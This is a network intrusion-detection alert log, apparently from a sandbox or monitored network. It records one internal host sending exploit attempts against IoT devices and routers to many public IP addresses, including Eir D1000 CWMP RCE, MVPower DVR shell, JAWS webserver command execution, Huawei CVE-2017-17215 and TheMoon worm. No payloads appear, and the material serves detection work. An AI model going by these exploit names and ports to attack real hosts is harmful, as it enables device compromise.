Timestamp:	03/18/24-09:59:34.149349
SID:	2023548
Source Port:	32800
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.222.9.43

Timestamp:	03/18/24-09:58:11.757601
SID:	2023548
Source Port:	59518
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 200.144.4.205

Timestamp:	03/18/24-09:59:25.919258
SID:	2030092
Source Port:	51130
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.96.14.164

Timestamp:	03/18/24-09:58:47.723610
SID:	2023548
Source Port:	40754
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 15.235.189.43

Timestamp:	03/18/24-09:59:18.381088
SID:	2025576
Source Port:	57544
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 46.101.125.102

Timestamp:	03/18/24-09:58:16.369908
SID:	2025883
Source Port:	53854
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.36.39.165

Timestamp:	03/18/24-09:59:26.148926
SID:	2023548
Source Port:	48392
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 211.228.200.196

Timestamp:	03/18/24-09:58:16.487387
SID:	2025883
Source Port:	39872
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.89.230.18

Timestamp:	03/18/24-09:59:48.759033
SID:	2025883
Source Port:	49280
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 154.95.206.90

Timestamp:	03/18/24-09:59:41.768271
SID:	2025576
Source Port:	37494
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 200.93.84.236

Timestamp:	03/18/24-09:59:57.057346
SID:	2023548
Source Port:	51654
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.74.80.205

Timestamp:	03/18/24-09:58:12.527872
SID:	2023548
Source Port:	59436
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 54.155.172.81

Timestamp:	03/18/24-09:58:44.932980
SID:	2025576
Source Port:	39802
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 193.123.123.131

Timestamp:	03/18/24-09:58:57.120042
SID:	2025883
Source Port:	44232
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.12.234

Timestamp:	03/18/24-09:59:44.806218
SID:	2018132
Source Port:	33074
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.159.3.230

Timestamp:	03/18/24-09:59:38.058177
SID:	2030092
Source Port:	32962
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 161.132.111.109

Timestamp:	03/18/24-10:00:19.370928
SID:	2030092
Source Port:	60978
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 208.53.227.38

Timestamp:	03/18/24-09:58:41.337574
SID:	2023548
Source Port:	60418
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 31.52.24.150

Timestamp:	03/18/24-09:57:01.139382
SID:	2023548
Source Port:	53930
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 34.198.169.148

Timestamp:	03/18/24-09:58:15.389618
SID:	2025883
Source Port:	43596
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 83.143.132.22

Timestamp:	03/18/24-09:56:59.247692
SID:	2025883
Source Port:	47934
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.254.101.1

Timestamp:	03/18/24-09:58:53.955010
SID:	2829579
Source Port:	50546
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 96.65.106.209

Timestamp:	03/18/24-09:58:52.556224
SID:	2025576
Source Port:	55362
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.251.168.124

Timestamp:	03/18/24-09:58:49.680476
SID:	2025883
Source Port:	56420
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 75.174.90.129

Timestamp:	03/18/24-09:57:13.130247
SID:	2023548
Source Port:	53640
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 35.159.3.230

Timestamp:	03/18/24-09:59:40.609826
SID:	2025883
Source Port:	33020
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 98.124.37.73

Timestamp:	03/18/24-10:00:09.383781
SID:	2025576
Source Port:	53348
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 87.140.39.231

Timestamp:	03/18/24-09:59:44.222954
SID:	2030092
Source Port:	35432
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 103.207.8.114

Timestamp:	03/18/24-09:59:27.824161
SID:	2025576
Source Port:	34938
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.235.85.170

Timestamp:	03/18/24-09:57:03.848581
SID:	2023548
Source Port:	58370
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.213.164.131

Timestamp:	03/18/24-09:59:51.701625
SID:	2025883
Source Port:	53534
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.93.133.108

Timestamp:	03/18/24-09:58:14.464317
SID:	2018132
Source Port:	46494
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.6.222.88

Timestamp:	03/18/24-09:58:44.251313
SID:	2023548
Source Port:	36780
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.202.137.41

Timestamp:	03/18/24-10:00:21.774386
SID:	2018132
Source Port:	38504
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 46.137.25.70

Timestamp:	03/18/24-09:59:47.293800
SID:	2025576
Source Port:	41782
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 38.11.227.79

Timestamp:	03/18/24-09:58:21.284307
SID:	2025883
Source Port:	56578
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.69.94.167

Timestamp:	03/18/24-09:59:19.121958
SID:	2030092
Source Port:	56682
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 62.99.89.49

Timestamp:	03/18/24-09:58:19.098718
SID:	2025883
Source Port:	45564
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.144.50.78

Timestamp:	03/18/24-09:57:00.976590
SID:	2023548
Source Port:	49504
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 101.133.155.40

Timestamp:	03/18/24-09:59:05.915589
SID:	2025576
Source Port:	45030
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 101.78.84.68

Timestamp:	03/18/24-10:00:22.305046
SID:	2023548
Source Port:	35400
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.38.175

Timestamp:	03/18/24-09:59:58.020122
SID:	2018132
Source Port:	37946
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 4.156.170.124

Timestamp:	03/18/24-09:59:25.020215
SID:	2025883
Source Port:	47032
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.85.144.61

Timestamp:	03/18/24-09:57:01.044532
SID:	2023548
Source Port:	41868
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 202.24.188.26

Timestamp:	03/18/24-09:59:05.741682
SID:	2025883
Source Port:	55910
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.0.118.185

Timestamp:	03/18/24-09:59:35.731879
SID:	2023548
Source Port:	53272
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.227.42.107

Timestamp:	03/18/24-09:59:02.291494
SID:	2023548
Source Port:	52226
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.136.152

Timestamp:	03/18/24-09:59:06.588127
SID:	2018132
Source Port:	54864
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.157.3

Timestamp:	03/18/24-09:58:28.956119
SID:	2018132
Source Port:	56916
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.93.55.186

Timestamp:	03/18/24-09:58:18.269515
SID:	2023548
Source Port:	59830
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.118.239.162

Timestamp:	03/18/24-09:58:57.027479
SID:	2030092
Source Port:	41408
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 184.175.24.136

Timestamp:	03/18/24-09:58:13.516703
SID:	2018132
Source Port:	58574
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 13.32.230.107

Timestamp:	03/18/24-09:58:15.710477
SID:	2025576
Source Port:	52644
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.222.9.43

Timestamp:	03/18/24-09:58:11.589556
SID:	2023548
Source Port:	59468
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 107.154.245.236

Timestamp:	03/18/24-09:59:14.357595
SID:	2023548
Source Port:	43882
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.120.20.207

Timestamp:	03/18/24-09:58:18.906942
SID:	2023548
Source Port:	56470
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 210.99.193.49

Timestamp:	03/18/24-10:00:15.508360
SID:	2023548
Source Port:	37428
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 130.185.73.183

Timestamp:	03/18/24-10:00:11.061090
SID:	2025883
Source Port:	52908
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.199.233.112

Timestamp:	03/18/24-10:00:21.334384
SID:	2023548
Source Port:	58322
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 70.183.114.218

Timestamp:	03/18/24-09:59:25.440137
SID:	2025576
Source Port:	57964
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.98.255.213

Timestamp:	03/18/24-09:59:40.161427
SID:	2023548
Source Port:	51984
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.239.232.48

Timestamp:	03/18/24-10:00:24.681621
SID:	2030092
Source Port:	60148
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.167.127

Timestamp:	03/18/24-09:56:56.697559
SID:	2018132
Source Port:	45226
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 84.72.24.228

Timestamp:	03/18/24-09:59:57.074555
SID:	2023548
Source Port:	37564
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 163.182.121.40

Timestamp:	03/18/24-09:57:01.948730
SID:	2023548
Source Port:	47724
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 96.41.3.80

Timestamp:	03/18/24-09:58:49.225797
SID:	2023548
Source Port:	38214
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.229.111.46

Timestamp:	03/18/24-09:59:53.891048
SID:	2030092
Source Port:	43838
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.52.251

Timestamp:	03/18/24-09:57:04.413542
SID:	2018132
Source Port:	48192
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 47.254.206.108

Timestamp:	03/18/24-09:58:15.046950
SID:	2025883
Source Port:	60230
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.143.190.135

Timestamp:	03/18/24-09:58:24.330823
SID:	2025883
Source Port:	38794
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 118.82.123.173

Timestamp:	03/18/24-09:59:38.155636
SID:	2025883
Source Port:	55034
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 108.138.161.56

Timestamp:	03/18/24-09:58:15.729956
SID:	2025576
Source Port:	34080
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 45.58.56.251

Timestamp:	03/18/24-09:59:49.003750
SID:	2025883
Source Port:	49038
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.63.49.186

Timestamp:	03/18/24-09:59:21.069537
SID:	2023548
Source Port:	36998
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 94.152.11.161

Timestamp:	03/18/24-09:59:24.947349
SID:	2030092
Source Port:	55142
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.43.199.212

Timestamp:	03/18/24-10:00:21.629398
SID:	2023548
Source Port:	36242
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.68.189.82

Timestamp:	03/18/24-09:59:50.663317
SID:	2023548
Source Port:	58726
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 141.138.210.242

Timestamp:	03/18/24-09:58:45.363950
SID:	2025576
Source Port:	39912
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 68.33.157.57

Timestamp:	03/18/24-09:59:34.567687
SID:	2025576
Source Port:	48910
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 187.60.83.119

Timestamp:	03/18/24-09:59:40.204027
SID:	2023548
Source Port:	45754
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 62.90.227.131

Timestamp:	03/18/24-09:57:00.521276
SID:	2025576
Source Port:	49878
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 118.52.86.77

Timestamp:	03/18/24-10:00:09.220746
SID:	2023548
Source Port:	45038
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.165.56.89

Timestamp:	03/18/24-09:59:39.917964
SID:	2025576
Source Port:	38084
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.103.93.208

Timestamp:	03/18/24-09:58:41.235234
SID:	2025883
Source Port:	44068
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 34.160.10.90

Timestamp:	03/18/24-09:59:11.596524
SID:	2030092
Source Port:	43916
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.201.29.32

Timestamp:	03/18/24-09:58:12.749584
SID:	2023548
Source Port:	49438
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.212.201.242

Timestamp:	03/18/24-09:59:31.656249
SID:	2023548
Source Port:	39644
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 222.115.32.210

Timestamp:	03/18/24-09:58:54.782425
SID:	2023548
Source Port:	58336
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.215.149.76

Timestamp:	03/18/24-09:59:21.257519
SID:	2023548
Source Port:	55894
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 5.250.244.190

Timestamp:	03/18/24-09:58:58.327673
SID:	2025576
Source Port:	35080
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 2.143.11.88

Timestamp:	03/18/24-10:00:00.663955
SID:	2023548
Source Port:	46274
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 170.62.11.198

Timestamp:	03/18/24-09:59:37.562356
SID:	2030092
Source Port:	59802
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 190.197.114.220

Timestamp:	03/18/24-09:58:48.171245
SID:	2023548
Source Port:	39552
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 92.205.108.211

Timestamp:	03/18/24-09:59:37.533735
SID:	2025883
Source Port:	60176
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 119.18.153.94

Timestamp:	03/18/24-10:00:15.307666
SID:	2025883
Source Port:	56704
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 221.151.229.215

Timestamp:	03/18/24-09:58:15.211194
SID:	2023548
Source Port:	39198
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 190.197.114.220

Timestamp:	03/18/24-09:58:48.327904
SID:	2023548
Source Port:	39572
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 172.125.77.119

Timestamp:	03/18/24-10:00:14.782732
SID:	2025883
Source Port:	55094
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 172.87.221.119

Timestamp:	03/18/24-09:59:26.589400
SID:	2025576
Source Port:	50414
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.224.12.94

Timestamp:	03/18/24-09:59:08.616105
SID:	2835222
Source Port:	51970
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 54.81.202.54

Timestamp:	03/18/24-09:59:25.382841
SID:	2025576
Source Port:	55746
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 66.171.6.151

Timestamp:	03/18/24-10:00:15.483936
SID:	2023548
Source Port:	58628
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 103.112.224.208

Timestamp:	03/18/24-09:56:59.546835
SID:	2025883
Source Port:	55384
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.225.88.98

Timestamp:	03/18/24-09:58:16.399214
SID:	2023548
Source Port:	45204
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 93.99.127.188

Timestamp:	03/18/24-09:58:11.897601
SID:	2025883
Source Port:	53524
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 52.223.20.244

Timestamp:	03/18/24-09:58:29.247576
SID:	2023548
Source Port:	36364
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 67.231.250.92

Timestamp:	03/18/24-09:58:44.158175
SID:	2025883
Source Port:	47848
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.120.20.207

Timestamp:	03/18/24-09:58:17.791731
SID:	2023548
Source Port:	56464
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.220.13.93

Timestamp:	03/18/24-09:59:49.344484
SID:	2023548
Source Port:	48774
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.171.202.175

Timestamp:	03/18/24-09:59:16.058536
SID:	2023548
Source Port:	33676
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 45.223.187.192

Timestamp:	03/18/24-10:00:10.011690
SID:	2030092
Source Port:	59148
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 82.146.59.91

Timestamp:	03/18/24-10:00:02.717058
SID:	2025883
Source Port:	47954
Destination Port:	80
Protocol:	TCP
